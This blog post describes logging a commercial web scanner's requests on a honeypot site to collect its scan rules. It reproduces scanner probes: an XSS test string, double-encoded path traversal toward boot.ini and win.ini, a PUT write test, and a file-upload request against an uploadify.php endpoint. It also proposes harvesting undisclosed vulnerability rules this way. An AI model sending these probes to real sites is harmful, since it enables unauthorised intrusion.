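A New Approach to Collecting Scan Rules

I recently came across a new way to collect vulnerability-scanning rules.

360 has a security monitoring tool, 360 Website Security: http://webscan.360.cn/

It can detect all kinds of website security issues, so I guessed there must be a scanner behind it.

So what if I set up a honeypot application, let it be scanned, and log every request? Wouldn't I then have a scan rule library as complete as 360's?

Here are the test results. Shortly after I submitted the site for scanning, my server started receiving a large number of requests.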

GET http://wufeifei.com/  
GET http://wufeifei.com/robots.txt  
GET http://wufeifei.com/  
GET http://wufeifei.com/index.php?a=1<script>alert(abc)<%2Fscript>  
GET http://wufeifei.com/  
GET http://wufeifei.com/nevercouldexistfilenosec  
GET http://wufeifei.com/nevercouldexistfilewebsec  
GET http://wufeifei.com/nevercouldexistfilenosec.aspx  
GET http://wufeifei.com/nevercouldexistfilewebsec.aspx  
GET http://wufeifei.com/nevercouldexistfilenosec.shtml  
GET http://wufeifei.com/nevercouldexistfilewebsec.shtml  
GET http://wufeifei.com/nevercouldexistfilenosec/  
GET http://wufeifei.com/nevercouldexistfilewebsec/  
GET http://wufeifei.com/nevercouldexistfilenosec.zip  
GET http://wufeifei.com/nevercouldexistfilenosec.zip  
GET http://wufeifei.com/nevercouldexistfilewebsec.zip  
GET http://wufeifei.com/nevercouldexistfilenosec.php  
GET http://wufeifei.com/nevercouldexistfilewebsec.php  
GET http://wufeifei.com/nevercouldexistfilenosec.bak  
GET http://wufeifei.com/nevercouldexistfilewebsec.bak  
GET http://wufeifei.com/nevercouldexistfilenosec.rar  
GET http://wufeifei.com/nevercouldexistfilewebsec.rar  
GET http://wufeifei.com/  
PUT http://wufeifei.com/jsky_web_scanner_test_file.txt zwell@nosec.org  
GET http://wufeifei.com/jsky_web_scanner_test_file.txt  
GET http://wufeifei.com/  
GET http://wufeifei.com/wp-admin  
GET http://wufeifei.com/admin.php  
GET http://wufeifei.com/nosec_Web_Scanner_Test.dll  
GET http://wufeifei.com/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini  
GET http://wufeifei.com/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini  
GET http://wufeifei.com/dede/  

Once the scan finished, I filtered and analyzed the request log; the scan rules numbered in the thousands.
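The filter-and-count step described above can be sketched as follows. This is an added example, not the author's code: the category names, the matching predicates and the reading of the `nevercouldexistfile...` requests as 404-baseline probes are assumptions, and the sample input is constructed from a few lines of the log excerpt above.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample: request lines taken from the log excerpt above
# (traversal paths shortened); the .zip probe appears twice on purpose.
SAMPLE_LOG = """\
GET http://wufeifei.com/
GET http://wufeifei.com/robots.txt
GET http://wufeifei.com/index.php?a=1<script>alert(abc)<%2Fscript>
GET http://wufeifei.com/nevercouldexistfilenosec.zip
GET http://wufeifei.com/nevercouldexistfilenosec.zip
GET http://wufeifei.com/nevercouldexistfilewebsec.bak
PUT http://wufeifei.com/jsky_web_scanner_test_file.txt zwell@nosec.org
GET http://wufeifei.com/wp-admin
GET http://wufeifei.com/.%252e/.%252e/.%252e/boot.ini
GET http://wufeifei.com/..%252f..%252f..%252fwindows/win.ini
"""

# Hypothetical probe categories; the first matching predicate wins.
CATEGORIES = [
    ("path-traversal", lambda m, t: "../" in t),
    ("reflected-xss", lambda m, t: "<script" in t.lower()),
    ("write-method", lambda m, t: m in ("PUT", "DELETE")),
    ("404-baseline", lambda m, t: "nevercouldexistfile" in t),
    ("admin-path", lambda m, t: re.search(r"/(wp-admin|admin\.php|dede/)", t) is not None),
]

def fully_decode(s, rounds=3):
    """Percent-decode repeatedly so double encoding (%252e -> %2e -> .) is exposed."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def extract_rules(log_text):
    """Map each unique (method, decoded target) to a category; repeats collapse."""
    rules = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        method = parts[0]
        target = fully_decode(re.sub(r"^https?://[^/]+", "", parts[1]))
        rules[(method, target)] = next(
            (label for label, pred in CATEGORIES if pred(method, target)), "other")
    return rules

def summarize(log_text):
    """Count unique probes per category."""
    return dict(Counter(extract_rules(log_text).values()))
```

Decoding before matching is what makes the double-encoded `%252e` and `%252f` requests show up as traversal probes instead of being counted as ordinary paths.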

On top of that, I found a startling rule in the request log:

POST http://wufeifei.com/bocadmin/j/uploadify.php -----------------------------  
Content-Disposition: form-data; name="folder"

/
-----------------------------
Content-Disposition: form-data; name="Filedata"; filename="scan_upload.txt"  
Content-Type: text/plain

This is a txt ,please delete it and scan website again --by webscan  
-----------------------------
Content-Disposition: form-data; name="submit"  

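bocadmin/j/uploadify.php: this rule is an arbitrary file upload vulnerability that I once found during a white-box audit. It affects the official websites of dozens of large groups and enterprises, and I reported it to Butian (补天) at the time:

Affected companies:

In other words, Butian adds all of its vulnerability exploitation rules to 360 Website Security.

Butian's vulnerabilities are not disclosed to third parties. If that is the case, the method above could be used to collect all undisclosed vulnerability detection methods, and even exploitation techniques. The same approach could also be used to collect the rule sets of similar services such as Baidu Anquanbao (百度安全宝) and Tangchao security scanning (唐朝安全扫描).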